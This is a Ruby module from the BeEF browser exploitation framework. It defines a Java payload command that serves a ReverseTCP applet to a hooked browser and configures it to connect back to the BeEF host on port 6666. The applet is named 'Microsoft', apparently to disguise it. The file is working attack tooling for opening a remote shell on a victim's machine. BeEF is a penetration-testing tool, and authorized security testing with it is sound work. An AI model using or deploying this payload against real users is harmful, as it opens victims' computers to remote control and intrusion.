#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Java_payload < BeEF::Core::Command

  def pre_send
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
  end

  def self.options
    @configuration = BeEF::Core::Configuration.instance
    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
    return [
        {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
        {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},
        {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
        {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
    ]
  end

  def post_execute
    save({'result' => @datastore['result']})
  end

end
